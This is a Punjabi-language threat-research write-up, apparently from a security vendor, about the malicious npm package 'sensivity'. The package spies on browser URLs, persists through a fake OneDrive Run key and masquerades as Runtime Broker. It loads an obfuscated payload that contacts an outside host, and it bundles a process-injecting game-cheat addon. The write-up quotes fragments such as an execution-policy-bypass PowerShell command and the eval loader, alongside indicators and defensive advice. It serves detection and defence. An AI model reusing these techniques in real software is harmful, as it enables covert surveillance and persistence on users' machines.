ValuePattern ਇੱਕ UI ਐਲੀਮੈਂਟ ਦੀ ਟੈਕਸਟ ਸਮੱਗਰੀ ਵਾਪਸ ਕਰਦਾ ਹੈ। ਇੱਕ ਬ੍ਰਾਊਜ਼ਰ ਦੇ ਐਡਰੈੱਸ-ਬਾਰ ਐਡਿਟ ਕੰਟਰੋਲ 'ਤੇ ਲਾਗੂ ਕੀਤਾ ਗਿਆ, ਇਹ ਪੀੜਤ ਦੁਆਰਾ ਵਰਤਮਾਨ ਵਿੱਚ ਵੇਖੇ ਜਾ ਰਹੇ URL ਨੂੰ ਵਾਪਸ ਕਰਦਾ ਹੈ — ਬ੍ਰਾਊਜ਼ਰ ਐਕਸਟੈਂਸ਼ਨ ਤੋਂ ਬਿਨਾਂ, ਡਿਸਕ 'ਤੇ ਪ੍ਰੋਫਾਈਲ ਨੂੰ ਛੂਹਣ ਤੋਂ ਬਿਨਾਂ, ਅਤੇ ਇੱਕ API ਹੁੱਕ ਤੋਂ ਬਿਨਾਂ। ਤਿਆਰ ਕੀਤੀ ਸਕ੍ਰਿਪਟ ਇੱਕ $browserNames ਸੂਚੀ ਨੂੰ ਦੁਹਰਾਉਂਦੀ ਹੈ ਅਤੇ ਜੋ ਵੀ ਬ੍ਰਾਊਜ਼ਰ ਫੋਰਗ੍ਰਾਉਂਡ ਹੈ, ਉਸ ਦੇ URL ਜਾਂ ਵਿੰਡੋ ਸਿਰਲੇਖ ਨੂੰ ਐਕਸਟਰੈਕਟ ਕਰਦੀ ਹੈ।

ਉਸ URL ਦੀ ਜਾਂਚ ਇੱਕ ਸਿੰਗਲ ਹਾਰਡ-ਕੋਡ ਕੀਤੇ ਟਾਰਗੇਟ ਦੇ ਵਿਰੁੱਧ ਕੀਤੀ ਜਾਂਦੀ ਹੈ:

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

ਯੂਟਿਊਬ ਦਿਖਾਉਣ ਵਾਲੀ ਬ੍ਰਾਊਜ਼ਰ ਵਿੰਡੋ ਲਈ ਤਿੰਨ-ਸਕਿੰਟ ਦੇ ਲੂਪ 'ਤੇ ਲਾਂਚਰ ਪੋਲ ਕਰਦਾ ਹੈ, ਅਤੇ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਪਾਵਰਸ਼ੈਲ ਇੱਕ Get-YouTubeBrowser / Test-TargetYouTubeUrl ਜੋੜਾ ਰੱਖਦਾ ਹੈ ਜੋ ਉਸ ਵੀਡੀਓ ਆਈਡੀ ਨਾਲ ਮੇਲ ਖਾਂਦਾ ਹੈ। ਦੇਖਣਯੋਗ ਪ੍ਰਭਾਵ ਦੋਹਰਾ ਹੁੰਦਾ ਹੈ: ਸਰਗਰਮ ਬ੍ਰਾਊਜ਼ਿੰਗ URL ਪੀੜਤ ਦੀ ਸਕ੍ਰੀਨ ਤੋਂ ਪੜ੍ਹਿਆ ਜਾਂਦਾ ਹੈ, ਅਤੇ ਇੱਕ ਖਾਸ ਯੂਟਿਊਬ ਵੀਡੀਓ ਨਾਲ ਹੋਸਟ ਦੀ ਇੰਟਰੈਕਸ਼ਨ ਦਾ ਪਤਾ ਲਗਾਇਆ ਜਾਂਦਾ ਹੈ। ਅਸੀਂ ਵਿਧੀ ਅਤੇ ਟੀਚੇ ਦਾ ਵਰਣਨ ਕਰਦੇ ਹਾਂ; ਅਸੀਂ ਉਨ੍ਹਾਂ ਤੋਂ ਕੋਈ ਉਦੇਸ਼ ਨਹੀਂ ਕੱਢਦੇ।

ਐਡਰੈੱਸ-ਬਾਰ ਰੀਡ ਉਹ ਹੈ ਜਿਸਨੂੰ ਸਕੈਨਰ sensitive_data_enumeration ਲੇਬਲ ਕਰਦਾ ਹੈ — ਇੱਕ Process::env ਅਤੇ UIAutomation ਸਰੋਤ ਜੋ ਇੱਕ ਨੈੱਟਵਰਕ-ਸਮਰੱਥ ਰਨਟਾਈਮ ਨੂੰ ਫੀਡ ਕਰਦਾ ਹੈ। ਇਹ ਇਕੱਲਤਾ ਵਿੱਚ ਸੁਭਾਵਕ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ ਅਤੇ UIAutomation ਸਰੋਤ ਤੋਂ ਅਸਪਸ਼ਟ ਸਰਵਰ ਤੱਕ ਡੇਟਾ ਜੀਵਨ ਚੱਕਰ ਦਾ ਪਤਾ ਲਗਾਉਣ ਤੋਂ ਬਾਅਦ ਹੀ ਨਿਗਰਾਨੀ ਦਾ ਹੱਲ ਕਰਦਾ ਹੈ।

ਸਮਾਂਰੇਖਾ ਅਤੇ ਸੰਸਕਰਣ ਵਿਕਾਸ

ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਇੱਕ ਵਾਰ ਵਿੱਚ ਅਪਲੋਡ ਨਹੀਂ ਹੁੰਦੀ। ਪ੍ਰਕਾਸ਼ਕ ਖਾਤੇ ਵਿੱਚ ਇਸ ਸਿੰਗਲ ਪੈਕੇਜ ਦੇ ਲਗਭਗ ਸੱਤਰ ਪ੍ਰਕਾਸ਼ਿਤ ਸੰਸਕਰਣ ਹਨ, ਅਤੇ ਸਮੀਖਿਆ ਵਿੰਡੋ ਦੌਰਾਨ ਨਵੇਂ ਆਉਂਦੇ ਰਹਿੰਦੇ ਹਨ। ਲਾਂਚਰ 2.5.x ਲਾਈਨ ਵਿੱਚ ਵਿਸ਼ੇਸ਼ਤਾ ਦਰ ਵਿਸ਼ੇਸ਼ਤਾ ਵਧਦਾ ਹੈ ਜਦੋਂ ਕਿ ਇਸਦੀ ਸਥਿਰਤਾ ਅਤੇ ਪੇਲੋਡ-ਲੋਡਿੰਗ ਸਥਿਰ ਰਹਿੰਦੀ ਹੈ।

ਮਿਤੀ (UTC) ਦੇਖੇ ਗਏ ਸੰਸਕਰਣ ਲਾਂਚਰ ਸਥਿਤੀ
2026-06-02 2.5.8 - 2.5.46 (25) ਬੇਸ QR-ਪੈਨਲ ਲਾਂਚਰ; ਰਨ-ਕੁੰਜੀ ਸਥਿਰਤਾ; ਅਸਪਸ਼ਟ ਸਰਵਰ ਦਾ ਮੁਲਾਂਕਣ।
2026-06-03 2.5.53 - 2.5.61 (6) ਇੱਕੋ ਫਿੰਗਰਪ੍ਰਿੰਟ; ਕੰਸੋਲ-ਟਰੇਸ ਦਮਨ।
2026-06-04 2.5.67, 2.5.68 (2) ਪਿੰਨ ਕੀਤਾ YouTube ਸ਼ਮੂਲੀਅਤ ਟੀਚਾ ਜੋੜਦਾ ਹੈ wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) ਸੀਮਾ ਭਰ ਵਿੱਚ ਪਾੜੇ ਨੂੰ ਦੁਬਾਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕਰਨਾ; ਸੁਪਰਵਾਈਜ਼ਰ/ਵਰਕਰ ਵਾਚਡੌਗ।

ਡਾਊਨਲੋਡ ਕੀਤੇ ਪ੍ਰਤੀਨਿਧੀਆਂ - 2.5.0, 2.5.36, ਅਤੇ 2.5.69 - ਵਿੱਚ ਲਾਂਚਰ ਨੂੰ ਪੜ੍ਹਨਾ ਚਾਰ ਪੱਧਰਾਂ ਨੂੰ ਦਰਸਾਉਂਦਾ ਹੈ। ਸਭ ਤੋਂ ਪਹਿਲਾਂ ਦੇ ਬਿਲਡਾਂ ਵਿੱਚ ਬੇਸ QR-ਪੇਅਰਿੰਗ ਲਾਂਚਰ ਹੁੰਦਾ ਹੈ। 2.5.33 ਤੋਂ UIAutomation ਐਡਰੈੱਸ-ਬਾਰ ਹਾਰਵੈਸਟਰ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ। 2.5.58 ਤੋਂ ਇੱਕ ਸੁਪਰਵਾਈਜ਼ਰ-ਪ੍ਰਬੰਧਨ ਪਰਤ ਜੋੜੀ ਜਾਂਦੀ ਹੈ। 2.5.64 ਤੋਂ ਵੱਖਰਾ ਸੁਪਰਵਾਈਜ਼ਰ/ਵਰਕਰ ਵਾਚਡੌਗ ਸੈੱਟ ਨੂੰ ਪੂਰਾ ਕਰਦਾ ਹੈ। ਇਸ ਦੌਰਾਨ, ਚਾਰ ਚੀਜ਼ਾਂ ਕਦੇ ਨਹੀਂ ਬਦਲਦੀਆਂ: OneDriveUpdate Run ਕੁੰਜੀ, OneDrive.Standalone.Updater.vbs ਡਰਾਪਰ, eval'd server.obf.js, ਅਤੇ sens.node ਮੂਲ ਮੋਡੀਊਲ।

2026-06-05 ਵੇਵ ਇਸ ਲਈ ਮਹੱਤਵਪੂਰਨ ਹੈ ਕਿਉਂਕਿ ਇਸਨੇ ਘੱਟ ਵਰਜਨ ਨੰਬਰਾਂ - 2.5.0 ਤੋਂ 2.5.15 - ਨੂੰ ਦੁਬਾਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤਾ ਜੋ ਕੁਝ ਦਿਨ ਪਹਿਲਾਂ ਪੁਸ਼ਟੀ ਕੀਤੇ ਵਰਜਨਾਂ ਦੇ ਹੇਠਾਂ ਬੈਠਦੇ ਹਨ। ਪ੍ਰਭਾਵ ਰਜਿਸਟਰੀ 'ਤੇ ਇੱਕ ਨਾਲ ਲੱਗਦੀ 2.5.x ਲਾਈਨ ਹੈ, ਹਰ ਵਰਜਨ ਵਿੱਚ ਇੱਕੋ ਲਾਂਚਰ ਹੁੰਦਾ ਹੈ।

ਸਮਝੌਤੇ ਦੇ ਸੰਕੇਤ

ਹੇਠਾਂ ਦਿੱਤੇ ਸਾਰੇ ਸੂਚਕਾਂ ਨੂੰ ਪੈਕੇਜ ਟਾਰਬਾਲ ਤੋਂ ਸਿੱਧਾ ਪੜ੍ਹਿਆ ਗਿਆ ਸੀ। ਪੜ੍ਹਨਯੋਗ ਲਾਂਚਰ ਵਿੱਚ ਸਿਰਫ਼ ਲੂਪਬੈਕ ਅਤੇ ਇੱਕ ਸਿੰਗਲ ਪ੍ਰਾਈਵੇਟ LAN ਪਤਾ ਹੈ; ਇੱਕ ਬਾਹਰੀ ਹੋਸਟਨੇਮ, izopi.com, ਨੂੰ server.obf.js ਨੂੰ ਔਫਲਾਈਨ ਡੀਓਬਫਸਕੇਟ ਕਰਕੇ ਪ੍ਰਾਪਤ ਕੀਤਾ ਗਿਆ ਸੀ।

ਦੀ ਕਿਸਮ ਸੂਚਕ ਸੂਚਨਾ
ਪੈਕੇਜ npm:sensivity (≈70 ਸੰਸਕਰਣ, 2.5.0-2.5.69) ਸਿੰਗਲ-ਪੈਕੇਜ ਪ੍ਰਕਾਸ਼ਕ; ਕੋਈ ਰਿਪੋਜ਼ਟਰੀ ਨਹੀਂ; ਬਿਨਾਂ ਲਾਇਸੈਂਸ ਵਾਲਾ।
ਫਾਇਲ launcher.js ਪੜ੍ਹਨਯੋਗ ਆਰਕੈਸਟਰੇਟਰ; ਮੁੱਖ ਅਤੇ ਬਿਨ ਟਾਰਗੇਟ।
ਫਾਇਲ server.obf.js (≈171 ਕੇ.ਬੀ.) obfuscator.io RC4 ਸਟ੍ਰਿੰਗ-ਐਰੇ ਪੇਲੋਡ, ਰਾਹੀਂ ਲੋਡ ਕੀਤਾ ਗਿਆ eval(fs.readFileSync(...)).
ਫਾਇਲ sens.node (≈6.87 ਮੈਬਾ) PE32+ x86-64 ਨੋਡ N-API ਐਡਆਨ; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
ਫਾਇਲ OneDrive.Standalone.Updater.vbs ਲੁਕਿਆ ਹੋਇਆ ਰੀਲੌਂਚਰ (node launcher.js).
ਨੈੱਟਵਰਕ https://izopi.com/check.php ਅਸਪਸ਼ਟ ਸਰਵਰ ਤੋਂ ਲਾਇਸੈਂਸ/ਪ੍ਰਮਾਣੀਕਰਨ ਅੰਤਮ ਬਿੰਦੂ ਪ੍ਰਾਪਤ ਕੀਤਾ ਗਿਆ; ਏਮਬੈਡਡ RSA ਪਬਲਿਕ ਕੁੰਜੀ ਜਵਾਬਾਂ ਦੀ ਪੁਸ਼ਟੀ ਕਰਦੀ ਹੈ।
ਸਮਰੱਥਾ OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread ਰਿਮੋਟ-ਪ੍ਰੋਸੈਸ ਇੰਜੈਕਸ਼ਨ ਅਤੇ ਮੈਮੋਰੀ ਪੜ੍ਹਨ/ਲਿਖਣ ਦੀ ਸਮਰੱਥਾ।
ਸਮਰੱਥਾ Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP ਡਾਇਰੈਕਟਐਕਸ 11 / ਇਮਗੁਈ ਗੇਮ ਓਵਰਲੇਅ ਏਮਬੋਟ, ਈਐਸਪੀ, ਅਤੇ ਟ੍ਰਿਗਰਬੋਟ ਵਿਸ਼ੇਸ਼ਤਾਵਾਂ ਨੂੰ ਲਾਗੂ ਕਰਦਾ ਹੈ।
ਰਜਿਸਟਰੀ HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate ਆਟੋਸਟਾਰਟ ਮੁੱਲ ਵੱਲ ਇਸ਼ਾਰਾ ਕਰ ਰਿਹਾ ਹੈ wscript.exe ਅਤੇ VBScript ਲਾਂਚਰ।
ਕਾਰਵਾਈ process.title = 'Runtime Broker' ਜਾਇਜ਼ ਵਿੰਡੋਜ਼ ਰਨਟਾਈਮ ਬ੍ਰੋਕਰ ਪ੍ਰਕਿਰਿਆ ਦੇ ਰੂਪ ਵਿੱਚ ਭੇਸ ਬਦਲਦਾ ਹੈ।
ਰਵੱਈਆ powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 ਤਿਆਰ ਕੀਤੀਆਂ ਪਾਵਰਸ਼ੈਲ ਸਕ੍ਰਿਪਟਾਂ ਲਈ ਵਰਤਿਆ ਜਾਣ ਵਾਲਾ ਐਗਜ਼ੀਕਿਊਸ਼ਨ-ਪਾਲਿਸੀ ਬਾਈਪਾਸ।
ਰਵੱਈਆ UIAutomation ValuePattern ਬ੍ਰਾਊਜ਼ਰ ਐਡਰੈੱਸ ਬਾਰ ਪੜ੍ਹੋ ਫੋਰਗਰਾਉਂਡ ਬ੍ਰਾਊਜ਼ਰ ਵਿੰਡੋ ਦਾ URL ਪੜ੍ਹਦਾ ਹੈ।
ਰਵੱਈਆ ਟੀਚਾ ਵੀਡੀਓ ਆਈਡੀ wJWta2lO0Lw; 3-ਸਕਿੰਟ ਦਾ YouTube ਪੋਲ ਪਿੰਨ ਕੀਤਾ ਗਿਆ ਸ਼ਮੂਲੀਅਤ-ਨਿਗਰਾਨੀ ਸਿਗਨਲ।
ਨੈੱਟਵਰਕ http://localhost:3000, ਪਿੱਛੇ ਹੱਟਣਾ http://192.168.1.16:3000 QR-ਪੇਅਰਿੰਗ ਕੰਟਰੋਲ ਪੈਨਲ ਸਥਾਨਕ ਤੌਰ 'ਤੇ ਅਤੇ LAN 'ਤੇ ਪ੍ਰਗਟ ਹੋਇਆ।
ਵਾਤਾਵਰਣ SENSIVITY_SUPERVISOR, SENSIVITY_WORKER ਵੱਖ ਕੀਤੇ ਵਾਚਡੌਗ ਪ੍ਰਕਿਰਿਆ ਤਾਲਮੇਲ ਝੰਡੇ।

ਵਿਸ਼ੇਸ਼ਤਾ, ਪ੍ਰਭਾਵ, ਅਤੇ ਬਚਾਅ ਕਰਨ ਵਾਲੇ

ਇਹ ਪੈਕੇਜ ਇੱਕ ਸਿੰਗਲ npm ਖਾਤੇ ਦੁਆਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤਾ ਗਿਆ ਹੈ ਜਿਸਦਾ ਦੱਸਿਆ ਗਿਆ ਈਮੇਲ ਇੱਕ ਗੈਰ-ਪ੍ਰਮਾਣਿਤ Gmail ਪਤਾ ਹੈ। ਖਾਤਾ ਇੱਕ ਡੂੰਘਾ ਨਕਾਰਾਤਮਕ ਰਜਿਸਟਰੀ ਪ੍ਰਤਿਸ਼ਠਾ ਸਕੋਰ ਰੱਖਦਾ ਹੈ, ਸਿਰਫ਼ ਇਸ ਇੱਕ ਪੈਕੇਜ ਨੂੰ ਬਣਾਈ ਰੱਖਦਾ ਹੈ ਅਤੇ ਪ੍ਰਕਾਸ਼ਿਤ ਕਰਦਾ ਹੈ, ਅਤੇ ਇਸਦਾ ਕੋਈ ਲਿੰਕ ਕੀਤਾ ਸਰੋਤ ਭੰਡਾਰ ਨਹੀਂ ਹੈ। ਅਸੀਂ ਈਮੇਲ ਦੀ ਮਾਲਕੀ ਦੀ ਪੁਸ਼ਟੀ ਨਹੀਂ ਕੀਤੀ ਹੈ ਅਤੇ ਅਸੀਂ ਮੁਹਿੰਮ ਨੂੰ ਪ੍ਰਕਾਸ਼ਕ ਖਾਤੇ ਨੂੰ ਦਿੰਦੇ ਹਾਂ, ਕਿਸੇ ਵੀ ਨਾਮੀ ਵਿਅਕਤੀ ਨੂੰ ਨਹੀਂ। ਲਾਂਚਰ ਵਿੱਚ ਕੋਈ ਸਪੱਸ਼ਟ ਟੈਕਸਟ ਬੁਨਿਆਦੀ ਢਾਂਚਾ ਨਹੀਂ ਹੈ, ਪਰ ਇੱਕ ਬਾਹਰੀ ਹੋਸਟ ਹੁਣ ਜਾਣਿਆ ਜਾਂਦਾ ਹੈ: ਅਸਪਸ਼ਟ ਸਰਵਰ ਲਾਇਸੈਂਸ ਜਾਂਚ ਲਈ izopi.com ਨਾਲ ਸੰਪਰਕ ਕਰਦਾ ਹੈ, ਅਤੇ ਮੂਲ ਮੋਡੀਊਲ - ਉਲਟ ਨਿਰਦੇਸ਼-ਦਰ-ਨਿਰਦੇਸ਼ ਦੀ ਬਜਾਏ ਇਸਦੇ ਆਯਾਤ ਸਾਰਣੀ ਅਤੇ ਸਟ੍ਰਿੰਗਾਂ ਤੋਂ ਪੜ੍ਹਿਆ ਜਾਂਦਾ ਹੈ - ਇੱਕ ਗੇਮ ਓਵਰਲੇ ਹੈ ਜੋ ਕਿਸੇ ਹੋਰ ਪ੍ਰਕਿਰਿਆ ਦੀ ਯਾਦਦਾਸ਼ਤ ਵਿੱਚ ਇੰਜੈਕਟ ਕਰਦਾ ਹੈ ਅਤੇ ਪੜ੍ਹਦਾ ਹੈ।

ਦੇਖਣਯੋਗ ਪ੍ਰਭਾਵ ਉਹਨਾਂ ਵਿੰਡੋਜ਼ ਉਪਭੋਗਤਾਵਾਂ 'ਤੇ ਪੈਂਦਾ ਹੈ ਜੋ ਇੱਕ ਕੰਟਰੋਲ-ਪੈਨਲ ਉਪਯੋਗਤਾ ਦੀ ਉਮੀਦ ਕਰਦੇ ਹੋਏ ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਨੂੰ ਸਥਾਪਿਤ ਅਤੇ ਚਲਾਉਂਦੇ ਹਨ। ਉਹਨਾਂ ਹੋਸਟਾਂ 'ਤੇ ਪੈਕੇਜ ਇੱਕ OneDrive ਟਾਸਕ ਦੇ ਰੂਪ ਵਿੱਚ ਭੇਸ ਵਿੱਚ ਆਟੋਸਟਾਰਟ ਪਰਸਿਸਟੈਂਸ ਸਥਾਪਤ ਕਰਦਾ ਹੈ, ਇੱਕ ਸਿਸਟਮ ਪ੍ਰਕਿਰਿਆ ਦੀ ਨਕਲ ਕਰਨ ਲਈ ਆਪਣਾ ਨਾਮ ਬਦਲਦਾ ਹੈ, ਜੋ ਵੀ ਉਪਭੋਗਤਾ ਬ੍ਰਾਊਜ਼ ਕਰ ਰਿਹਾ ਹੈ ਉਸਦਾ URL ਪੜ੍ਹਦਾ ਹੈ, ਅਤੇ ਇੱਕ ਪੇਅਰਿੰਗ ਪੈਨਲ ਖੜ੍ਹਾ ਕਰਦਾ ਹੈ ਜੋ ਮਸ਼ੀਨ ਨੂੰ ਸਥਾਨਕ ਨੈੱਟਵਰਕ 'ਤੇ ਇੱਕ ਰਿਮੋਟ ਨਾਲ ਜੋੜਦਾ ਹੈ। ਸੁਪਰਵਾਈਜ਼ਰ/ਵਰਕਰ ਵਾਚਡੌਗ ਦਾ ਮਤਲਬ ਹੈ ਕਿ ਇੱਕ ਸਿੰਗਲ ਪ੍ਰੋਸੈਸ ਕਿਲ ਇਸਨੂੰ ਨਹੀਂ ਹਟਾਉਂਦਾ; ਰਨ-ਕੀ ਐਂਟਰੀ ਰੀਬੂਟ ਤੋਂ ਬਚ ਜਾਂਦੀ ਹੈ। ਮੈਕੋਸ ਅਤੇ ਲੀਨਕਸ ਲਾਂਚਰ ਦੁਆਰਾ ਨਿਸ਼ਾਨਾ ਨਹੀਂ ਹਨ - ਪਰਸਿਸਟੈਂਸ, ਪਾਵਰਸ਼ੈਲ, ਅਤੇ UIAutomation ਮਾਰਗ ਸਿਰਫ਼ ਵਿੰਡੋਜ਼-ਸਿਰਫ਼ ਹਨ।

ਸੱਤਰ-ਵਰਜਨ ਦਾ ਚਰਨ ਇੱਕ ਰੁਝਾਨ ਹੈ ਜਿਸ ਨੂੰ ਰੋਕਣਾ ਚਾਹੀਦਾ ਹੈ। ਕੁਝ ਦਿਨਾਂ ਵਿੱਚ ਇੱਕ ਪੈਕੇਜ ਨੂੰ ਦਰਜਨਾਂ ਵਾਰ ਦੁਬਾਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕਰਨਾ, ਜਿਸ ਵਿੱਚ ਪਹਿਲਾਂ ਹੀ ਹਟਾਏ ਗਏ ਸੰਸਕਰਣ ਨੰਬਰਾਂ ਤੋਂ ਹੇਠਾਂ ਬੈਕ-ਫਿਲਿੰਗ ਵਰਜਨ ਨੰਬਰ ਸ਼ਾਮਲ ਹਨ, ਹਟਾਉਣ ਦੇ ਵਿਚਕਾਰ ਰਜਿਸਟਰੀ 'ਤੇ ਇੱਕ ਲਾਈਵ ਕਾਪੀ ਰੱਖਦਾ ਹੈ ਅਤੇ ਵਰਜਨ-ਪਿੰਨ ਕੀਤੀਆਂ ਬਲਾਕਲਿਸਟਾਂ ਨੂੰ ਨਿਰਾਸ਼ ਕਰਦਾ ਹੈ। sensivity@2.5.61 ਲਈ ਇੱਕ ਬਲਾਕਲਿਸਟ ਐਂਟਰੀ ਅਗਲੇ ਦਿਨ ਦੁਬਾਰਾ ਪ੍ਰਕਾਸ਼ਿਤ sensivity@2.5.3 ਦੇ ਵਿਰੁੱਧ ਕੁਝ ਨਹੀਂ ਕਰਦੀ।

ਡਿਫੈਂਡਰ ਹੇਠ ਲਿਖਿਆਂ 'ਤੇ ਕਾਰਵਾਈ ਕਰ ਸਕਦੇ ਹਨ:

  • ਰਜਿਸਟਰੀ-ਪ੍ਰੌਕਸੀ ਅਤੇ CI ਅਲਾਉਲਿਸਟਾਂ ਵਿੱਚ ਪੈਕੇਜ ਨਾਮ ਸੰਵੇਦਨਸ਼ੀਲਤਾ ਨੂੰ ਪੂਰੀ ਤਰ੍ਹਾਂ ਬਲੌਕ ਕਰੋ। ਵਿਅਕਤੀਗਤ ਸੰਸਕਰਣਾਂ ਨੂੰ ਪਿੰਨ ਕਰਨ ਨਾਲ ਮੁੜ ਪ੍ਰਕਾਸ਼ਿਤ ਕੈਡੈਂਸ ਘੱਟ ਜਾਂਦਾ ਹੈ; ਨਾਮ ਟਿਕਾਊ ਸੂਚਕ ਹੈ।
  • OneDriveUpdate ਨਾਮਕ ਇੱਕ ਰਨ ਵੈਲਯੂ ਦੀ ਭਾਲ ਕਰੋ ਜਿਸਦਾ ਡੇਟਾ ਪ੍ਰਤੀ-ਉਪਭੋਗਤਾ ਮਾਰਗ ਵਿੱਚ .vbs ਦੇ ਵਿਰੁੱਧ wscript.exe ਨੂੰ ਇਨਵੋਕ ਕਰਦਾ ਹੈ। ਅਸਲੀ OneDrive ਅੱਪਡੇਟਰ ਇਸ ਤਰੀਕੇ ਨਾਲ ਰਜਿਸਟਰਡ ਨਹੀਂ ਹੈ।
  • ਇੱਕ Node.js ਪ੍ਰਕਿਰਿਆ ਬਾਰੇ ਚੇਤਾਵਨੀ ਜਿਸਦਾ process.title ਰਨਟਾਈਮ ਬ੍ਰੋਕਰ ਹੈ। ਅਸਲੀ ਬ੍ਰੋਕਰ RuntimeBroker.exe ਹੈ, ਨੋਡ ਰਨਟਾਈਮ ਨਹੀਂ।
  • ਪੈਕੇਜਾਂ ਦੇ npm install-time ਫੈਚਾਂ ਨੂੰ ਫਲੈਗ ਕਰੋ ਜੋ ਇੱਕ ਕੰਪਾਇਲ ਕੀਤੇ .node ਐਡਆਨ ਦੇ ਨਾਲ ਨਾਲ ਇੱਕ ਭੈਣ-ਭਰਾ .obf.js ਫਾਈਲ ਦੇ eval(fs.readFileSync(…)) ਨੂੰ ਭੇਜਦੇ ਹਨ। ਉਹ ਜੋੜੀ - ਇੱਕ ਅਸਪਸ਼ਟ ਟੈਕਸਟ ਪੇਲੋਡ ਦੇ ਅੱਗੇ ਲੋਡ ਕੀਤੀ ਗਈ ਅਪਾਰਦਰਸ਼ੀ ਨੇਟਿਵ ਬਾਈਨਰੀ - ਇੱਥੇ ਢਾਂਚਾਗਤ ਦੱਸਦੀ ਹੈ, ਕਿਸੇ ਵੀ ਸਟ੍ਰਿੰਗ IOC ਤੋਂ ਸੁਤੰਤਰ।
  • ਕਿਸੇ ਅਣਕਿਆਸੇ ਨੋਡ ਪ੍ਰਕਿਰਿਆ ਦੁਆਰਾ ਪੈਦਾ ਹੋਏ ਪੋਰਟ 3000 'ਤੇ ਕਿਸੇ ਵੀ ਸਥਾਨਕ ਤੌਰ 'ਤੇ ਜੁੜੇ ਸਰੋਤੇ ਨੂੰ ਪ੍ਰਬੰਧਿਤ ਵਿੰਡੋਜ਼ ਐਂਡਪੁਆਇੰਟਸ 'ਤੇ ਸ਼ੱਕੀ ਸਮਝੋ।
  • ਡਿਵੈਲਪਰ ਜਾਂ ਅੰਤਮ-ਉਪਭੋਗਤਾ ਹੋਸਟਾਂ ਤੋਂ izopi.com ਨੂੰ ਆਊਟਬਾਊਂਡ ਬੇਨਤੀਆਂ 'ਤੇ ਬਲੌਕ ਜਾਂ ਚੇਤਾਵਨੀ; ਇਹ ਪੈਕੇਜ ਦਾ ਇੱਕੋ ਇੱਕ ਬਾਹਰੀ ਅੰਤਮ ਬਿੰਦੂ ਹੈ, ਜੋ ਕਿ ਔਬਫਸਕੇਟਡ ਸਰਵਰ ਤੋਂ /check.php 'ਤੇ ਪਹੁੰਚਿਆ ਜਾਂਦਾ ਹੈ।
  • ਕਿਸੇ ਵੀ ਬੰਡਲ ਕੀਤੇ .node ਐਡਆਨ ਲਈ, ਇਸ 'ਤੇ ਭਰੋਸਾ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ ਇਸਦੀ ਆਯਾਤ ਸਾਰਣੀ ਦੀ ਜਾਂਚ ਕਰੋ। OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread ਸੁਮੇਲ ਰਿਮੋਟ-ਪ੍ਰੋਸੈਸ ਇੰਜੈਕਸ਼ਨ ਹੈ ਭਾਵੇਂ ਪੈਕੇਜ ਕੀ ਕਰਨ ਦਾ ਦਾਅਵਾ ਕਰਦਾ ਹੈ; ਇੱਥੇ ਇਹ ਇੱਕ Direct3D ਓਵਰਲੇਅ ਅਤੇ aimbot/ESP/triggerbot ਸਟ੍ਰਿੰਗਾਂ ਦੇ ਕੋਲ ਬੈਠਦਾ ਹੈ।

ਸਥਿਰ-ਵਿਸ਼ਲੇਸ਼ਣ ਲਈ pipelines, ਵਰਜਨ ਚਰਨ ਵਿੱਚ ਕਨਵੀਕਸ਼ਨ ਸ਼ਕਲ ਟਿਕਾਊ ਹੈ: ਇੱਕ ਗੈਰ-ਨੈੱਟਵਰਕ ਇੰਸਟਾਲ ਪ੍ਰੋਫਾਈਲ, ਇੱਕ ਜਾਣੇ-ਪਛਾਣੇ ਸਿਸਟਮ-ਪ੍ਰਕਿਰਿਆ ਨਾਮ ਲਈ ਇੱਕ ਪ੍ਰਕਿਰਿਆ-ਸਿਰਲੇਖ ਅਸਾਈਨਮੈਂਟ, ਪਾਵਰਸ਼ੈਲ ਦੁਆਰਾ ਇੱਕ ਰਨ-ਕੁੰਜੀ ਲਿਖਣਾ, ਅਤੇ ਡਿਸਕ ਤੋਂ ਪੜ੍ਹੀ ਗਈ ਇੱਕ ਫਾਈਲ ਦਾ ਮੁਲਾਂਕਣ। ਇਹਨਾਂ ਵਿੱਚੋਂ ਕੋਈ ਵੀ ਡੋਮੇਨ, ਇੱਕ IP, ਜਾਂ ਇੱਕ ਸੰਸਕਰਣ ਨੰਬਰ 'ਤੇ ਨਿਰਭਰ ਨਹੀਂ ਕਰਦਾ ਹੈ ਜਿਸਨੂੰ ਅਗਲਾ ਪੁਨਰ ਪ੍ਰਕਾਸ਼ਨ ਘੁੰਮਾ ਸਕਦਾ ਹੈ।

 ਹਵਾਲੇ

[npm: ਸੰਵੇਦਨਸ਼ੀਲਤਾ] – ਇੱਥੇ ਚਰਚਾ ਕੀਤੀ ਗਈ ਪੈਕੇਜ ਵਰਜਨ ਲਾਈਨ ਲਈ ਰਜਿਸਟਰੀ ਪੰਨਾ; ਬਰਖਾਸਤਗੀ ਦੇ ਅਧੀਨ।

sca-ਟੂਲਜ਼-ਸਾਫਟਵੇਅਰ-ਰਚਨਾ-ਵਿਸ਼ਲੇਸ਼ਣ-ਟੂਲਜ਼
ਆਪਣੇ ਸਾਫਟਵੇਅਰ ਜੋਖਮਾਂ ਨੂੰ ਤਰਜੀਹ ਦਿਓ, ਸੁਧਾਰੋ ਅਤੇ ਸੁਰੱਖਿਅਤ ਕਰੋ
ਆਪਣਾ ਮੁਫ਼ਤ ਖਾਤਾ ਪ੍ਰਾਪਤ ਕਰੋ।
ਕੋਈ ਕ੍ਰੈਡਿਟ ਕਾਰਡ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ

